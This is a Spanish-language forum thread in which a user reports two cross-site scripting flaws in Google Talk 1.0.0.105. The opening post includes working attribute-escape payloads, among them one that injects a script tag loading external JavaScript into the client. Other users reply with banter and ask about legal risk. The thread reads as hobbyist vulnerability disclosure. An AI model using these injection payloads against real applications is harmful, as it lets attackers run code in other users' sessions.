XSS en Google Talk 1.0.0.105

WHK · 18 Octubre 2009, 01:54 AM

Bueno, comenzé a probar en una virtual de gtalk a gtalk y me encontré con dos xss.
Por ejemplo cuando uno escribe un enlace http://<h1>test se ejecuta inmediatamente ya que el enío del string dentro de un href no se filtra y eso significa que un xss puede alojarse en el nombre de la url y el otro en la url misma como código html.

Cuando escribimos http://<h1>test en realidad se imprime esto: <a href='http://<h1>test'>http://<h1>test</a> y como se utilizan comillas simples para los tags de html podemos escapar con http://'onclick='alert(/lol/)'x=' y quedará masomenos así:
<a href='http://'onclick='alert(/lol/)'x=''>http://'onclick='alert(/lol/)'x='</a>

xDD y el resultado es algo asi como esto:

Conversando con SirDarckCat estubimos casi toda la noche jugando con el google talk cambiandole el fondo por una imagen de doom3, paisajes, coloreando los bordes, letras hasta que a el se le ocurrió inyectar el firebug y saber un poco mas del código fuente ya que en realidad no habia archivo temporal porque utilizaba un iframe de internet explorer 6 con la dirección about:blank haciendo document.write

A los que quiean inyectar el firebug pueden escribir estas dos lineas:

Citarhttp://'onclick='document.body.appendChild(document.createElement("script")).src="http://getfirebug.com/releases/lite/1.2/firebug-lite-compressed.js"'x=';

hacerle click y luego

Citarhttp://'onclick='alert(firebug.init())'x='

y al hacerle click llamarán a firebug

Está entetenido.
Para los que quieran descompilar el ejecutable del gtalk está cifrado en molebox 2.5.7 .

kamsky · 18 Octubre 2009, 21:35 PM

os aburris mucho,verdad¿¿

Jubjub · 18 Octubre 2009, 21:38 PM

Grandes

Debci · 21 Octubre 2009, 15:06 PM

que gente... se nota el tiempo libre jaja xDD
Y google no podria hacer nada al respecto? no pueden denunciaros o algo por el estilo??

Saludos

:ohk<any> · 21 Octubre 2009, 15:58 PM

genial

jdc · 21 Octubre 2009, 17:53 PM

Nah.... Google regala poleras xD

Debci · 21 Octubre 2009, 18:20 PM

Cita de: janito24 en 21 Octubre 2009, 17:53 PM
Nah.... Google regala poleras xD

enserio, si haceis este tipo de cosas peuden tomar algun tipo de carga legal contra el atacante/tester?

Saludos

jdc · 21 Octubre 2009, 18:39 PM

Conociendo a los descubridores... Google ya debe estar enterado y preparando una actualización xD

WHK · 21 Octubre 2009, 20:49 PM

google no pierde el tiempo en demandar a la gente que encuentra bugs en sus sistemas, todo lo contrario.. deben sentirse agradecidos porque hay gente que trabaja gratuitamente buscando bugs en sus sistemas para hacerlos mejores y se ahorran los auditores de código

de hecho si nadie desvelara ningun bug de windows todavía estaríamos en la tecnologia de win 98

Debci · 21 Octubre 2009, 22:05 PM

Cita de: WHK en 21 Octubre 2009, 20:49 PM
google no pierde el tiempo en demandar a la gente que encuentra bugs en sus sistemas, todo lo contrario.. deben sentirse agradecidos porque hay gente que trabaja gratuitamente buscando bugs en sus sistemas para hacerlos mejores y se ahorran los auditores de código de hecho si nadie desvelara ningun bug de windows todavía estaríamos en la tecnologia de win 98

jaja ok xD

Saludos